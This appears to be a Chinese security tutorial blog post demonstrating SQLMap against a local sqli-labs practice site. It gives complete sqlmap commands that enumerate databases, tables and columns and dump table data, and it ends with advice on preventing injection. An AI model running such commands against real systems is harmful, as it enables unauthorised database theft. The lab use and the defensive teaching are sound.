当前位置: 首页 > news >正文

建设个网站交流网站模版

建设个网站,交流网站模版,建设银行信用卡账网站,外包公司加盟文章目录 简介获取当前数据库和用户信息获取MySQL中的所有数据库名称查询wucai数据库中的所有数据表查看heros数据表中的所有字段查询heros表中的英雄信息总结参考文献 简介 从上一小节,可以发现,如果我们编写的代码存在着SQL注入的漏洞,后果…

文章目录

  • 简介
  • 获取当前数据库和用户信息
  • 获取MySQL中的所有数据库名称
  • 查询wucai数据库中的所有数据表
  • 查看heros数据表中的所有字段
  • 查询heros表中的英雄信息
  • 总结
  • 参考文献

简介

从上一小节,可以发现,如果我们编写的代码存在着SQL注入的漏洞,后果还是很可怕的,只需要通过访问information_schema表就可以将数据库的信息全部暴露出来。

接下来我们了解下SQLMap工具,它可以帮我们自动化完成SQL注入的过程。让我们使用SQLmap工具,再重现一下上一节做的人工注入的步骤。

获取当前数据库和用户信息

执行以下命令:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --current-db --current-user

--current-db表示获取当前数据库名称;

--current-user表示获取当前用户的信息

然后你可以看到SQLmap帮我们获取了相应的结果:

在这里插入图片描述

获取MySQL中的所有数据库名称

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 --dbs

这里我们使用--threads来指定SQLmap的最大并发数,通常不要超过10。

于是它帮我们获取了当前MySQL中的8个数据库名称:

在这里插入图片描述

查询wucai数据库中的所有数据表

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 -D wucai --tables

-D表示待查询的数据库的库名;

--tables表示显示出所有数据表名称;

在这里插入图片描述

查看heros数据表中的所有字段

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 -D wucai -T heros --columns

-T表示指定的数据表名称;

--columns表示对所有字段名称进行查询;

在这里插入图片描述

查询heros表中的英雄信息

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D wucai -T heros -C id,name,hp_max --dump

-C后面表示需要查询的字段名;

--dump表示展示具体数据。

在这里插入图片描述

至此,整个数据库对我们来说,就是不设防的状态了。

总结

总之,代码规范性对web安全来讲,非常重要,尽量不要采用直接拼接的方式进行查询,一定要拼接的话,必须在后端提前做好参数验证(如java的sqlparameter),不能因为在前端验证完参数就认为安全了,前端的验证是很容易被绕过的。

同时,web上线之后,还需要将生产环境中的错误提示信息关闭,坚决不能给不法分子可乘之机,以减少被SQL 注入的风险。

此外,我们也可以采用第三方的工具,比如SQLmap来对web应用进行检测,以增强web安全性。

当然,本节讲的内容都很基础,现在真正的SQL注入攻防,可比本节展示的内容复杂多了。

参考文献

  1. 37丨SQL注入:你的SQL是如何被注入的?
http://www.yayakq.cn/news/966156/

相关文章:

  • 水贝网站建设微商网站如何做推广
  • 苏州出名的网站公司wordpress attachment
  • 如何用dede做带下单的网站天津塘沽爆炸视频
  • excel连接网站 做数据分析百度账号快速注册
  • 企业网站要更新文章吗企业建设网站的功能是什么意思
  • dw学校网站制作教程大型平台网站开发
  • 高端网站建设教学Wordpress 图片左右滑动
  • 怎么创建网站 免费滴济宁网站定制公司
  • 免费做金融网站有哪些北京的p2p网站建设
  • 电商平台建站广州代注册公司哪家好
  • 网站建设公司怎么做的app开发与网站开发
  • 忻州网站建设培训今天刚刚长沙又增加了一例
  • 哪里可以做网站教程上饶网站建设公司
  • discuz品牌空间网站江都网络建站
  • 济南seo网站优化公司网站建设开发费用
  • 网站安全建设方案例文设计网店运营策划方案
  • 中小企业服务中心网站建设天津建设工程信息网里如何添加企业资质
  • 汕头市澄海建设局门户网站高速wordpress优化
  • 商务网站系统中支付功能怎么做商城网站流程
  • 网站开发工具有组合公司网站建设制作
  • 如何建网站平台wordpress如何改文章id
  • 我做外贸要开国际网站吗无锡信息网站建设
  • 像网站的ppt怎么做哪些网站可以赚钱
  • 建设行业网站平台的瓶颈响应式网站和自适应网站的区别
  • 视频在线制作网站用dw做网站怎么做出下拉菜单
  • 什么是部署php网站跨境电商免费平台有哪些
  • wordpress网站可以显示中文和英文最成功的网络营销案例
  • 河南最近的热搜事件网站海外推广谷歌seo方案
  • 临沂网站建设厂家我为群众办实事项目清单
  • 开发网站心得建设网站好学吗